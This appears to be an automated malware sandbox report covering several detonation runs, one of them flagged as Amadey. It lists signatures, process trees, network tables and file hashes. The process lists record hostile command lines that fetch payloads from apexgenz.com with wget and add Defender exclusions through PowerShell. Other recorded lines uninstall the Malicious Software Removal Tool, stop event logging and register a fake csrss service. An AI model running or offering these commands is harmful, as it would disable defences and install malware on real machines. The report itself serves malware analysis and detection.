C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 52.111.229.43:443 | tcp | |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.64.52.20.in-addr.arpa | udp |
Files
Analysis: behavioral28
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 03:23
Platform
win10v2004-20240226-en
Max time kernel
1698s
Max time network
1181s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\wget.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\wget.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp |
Files
memory/4212-0-0x0000000000400000-0x00000000008F2000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:53
Platform
win7-20240221-en
Max time kernel
1794s
Max time network
1819s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\Xfh5GWnGPMjT.ps1
Network
Files
memory/2804-4-0x000000001B390000-0x000000001B672000-memory.dmp
memory/2804-5-0x0000000002420000-0x0000000002428000-memory.dmp
memory/2804-6-0x000007FEF5E70000-0x000007FEF680D000-memory.dmp
memory/2804-7-0x0000000002500000-0x0000000002580000-memory.dmp
memory/2804-10-0x0000000002500000-0x0000000002580000-memory.dmp
memory/2804-9-0x0000000002504000-0x0000000002507000-memory.dmp
memory/2804-8-0x000007FEF5E70000-0x000007FEF680D000-memory.dmp
memory/2804-11-0x000007FEF5E70000-0x000007FEF680D000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:52
Platform
win10v2004-20240226-en
Max time kernel
1739s
Max time network
1515s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\Xfh5GWnGPMjT.ps1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b13grvey.u5d.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3584-9-0x000001BD6D840000-0x000001BD6D862000-memory.dmp
memory/3584-12-0x00007FFA2F0B0000-0x00007FFA2FB71000-memory.dmp
memory/3584-13-0x00007FFA2F0B0000-0x00007FFA2FB71000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:53
Platform
win7-20240221-en
Max time kernel
1799s
Max time network
1819s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\YwTGpGD7UtG1.ps1
Network
Files
memory/2660-4-0x000000001B260000-0x000000001B542000-memory.dmp
memory/2660-5-0x0000000002410000-0x0000000002418000-memory.dmp
memory/2660-6-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp
memory/2660-7-0x0000000002450000-0x00000000024D0000-memory.dmp
memory/2660-8-0x0000000002450000-0x00000000024D0000-memory.dmp
memory/2660-9-0x0000000002450000-0x00000000024D0000-memory.dmp
memory/2660-10-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp
memory/2660-11-0x0000000002450000-0x00000000024D0000-memory.dmp
memory/2660-12-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp
memory/2660-13-0x0000000002450000-0x00000000024D0000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 03:23
Platform
win10v2004-20240226-en
Max time kernel
1687s
Max time network
1165s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral31
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 03:26
Platform
win7-20240221-en
Max time kernel
1799s
Max time network
1820s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2660 wrote to memory of 2580 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
| PID 2660 wrote to memory of 2580 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
| PID 2660 wrote to memory of 2580 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\BLAKEX64.dll,#1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2660 -s 84
Network
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:52
Platform
win10v2004-20240226-en
Max time kernel
1795s
Max time network
1803s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\WtFlkRqeJ61k.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x324 0x4e4
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4836 --field-trial-handle=2260,i,3303482231723870786,2954015409682154873,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3808 --field-trial-handle=2260,i,3303482231723870786,2954015409682154873,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| GB | 142.250.187.202:443 | tcp | |
| US | 13.107.253.64:443 | tcp | |
| US | 52.111.229.43:443 | tcp | |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.173.189.20.in-addr.arpa | udp |
Files
memory/4840-0-0x000001FDAB5D0000-0x000001FDAB5F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nfossle4.ll3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4840-10-0x00007FFED23E0000-0x00007FFED2EA1000-memory.dmp
memory/4840-11-0x000001FDA94A0000-0x000001FDA94B0000-memory.dmp
memory/4840-12-0x000001FDA94A0000-0x000001FDA94B0000-memory.dmp
memory/4840-13-0x000001FDA94A0000-0x000001FDA94B0000-memory.dmp
memory/4840-16-0x00007FFED23E0000-0x00007FFED2EA1000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:52
Platform
win7-20240221-en
Max time kernel
1787s
Max time network
1763s
Command Line
Signatures
Amadey
Creates new service(s)
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\ProgramData\SystemFiles\csrss.exe | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\ProgramData\SystemFiles\csrss.exe | N/A |
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\conhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Windows\system32\conhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\SystemFiles\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\SystemFiles\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\SystemFiles\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\SystemFiles\csrss.exe | N/A |
Uses the VBS compiler for execution
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\SystemFiles\csrss.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\SystemFiles\csrss.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 940 set thread context of 892 | N/A | C:\Users\Admin\AppData\Roaming\services\plugin0228 | C:\Users\Admin\AppData\Roaming\services\plugin0228 |
| PID 1664 set thread context of 1880 | N/A | C:\ProgramData\SystemFiles\csrss.exe | C:\Windows\system32\conhost.exe |
| PID 1664 set thread context of 2932 | N/A | C:\ProgramData\SystemFiles\csrss.exe | C:\Windows\system32\conhost.exe |
| PID 2988 set thread context of 2080 | N/A | C:\Users\Admin\AppData\Roaming\services\3plugin0228 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\wusa.lock | C:\Windows\system32\wusa.exe | N/A |
| File created | C:\Windows\wusa.lock | C:\Windows\system32\wusa.exe | N/A |
| File created | C:\Windows\wusa.lock | C:\Windows\system32\wusa.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\Launhcer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\plugin0228 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\plugin0228 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\ProgramData\SystemFiles\csrss.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\3plugin0228 | N/A |
| N/A | N/A | C:\ProgramData\SystemFiles\csrss.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Loads dropped DLL
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Roaming\services\plugin0228 |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 00ca752cb66ada01 | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\system32\conhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
"C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
"C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/1/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\plugin0228
C:\Users\Admin\AppData\Roaming\services\plugin0228
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/2/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\plugin0228
"C:\Users\Admin\AppData\Roaming\services\plugin0228"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 892 -s 204
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\2plugin2901
C:\Users\Admin\AppData\Roaming\services\2plugin2901
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/3/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "csrss"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "csrss" binpath= "C:\ProgramData\SystemFiles\csrss.exe" start= "auto"
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "csrss"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\services\2plugin2901"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\ProgramData\SystemFiles\csrss.exe
C:\ProgramData\SystemFiles\csrss.exe
C:\Users\Admin\AppData\Roaming\services\3plugin0228
C:\Users\Admin\AppData\Roaming\services\3plugin0228
C:\Windows\system32\conhost.exe
conhost.exe
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 212
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\ProgramData\SystemFiles\csrss.exe
"C:\ProgramData\SystemFiles\csrss.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | apexgenz.com | udp |
| NL | 185.14.29.199:80 | apexgenz.com | tcp |
| US | 8.8.8.8:53 | solvadordali.com | udp |
| NL | 185.14.29.199:80 | solvadordali.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| NL | 185.14.29.199:80 | solvadordali.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| NL | 194.87.31.18:3333 | tcp |
Files
memory/2076-0-0x0000000000160000-0x0000000000161000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab320A.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\Local\Temp\Tar321D.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
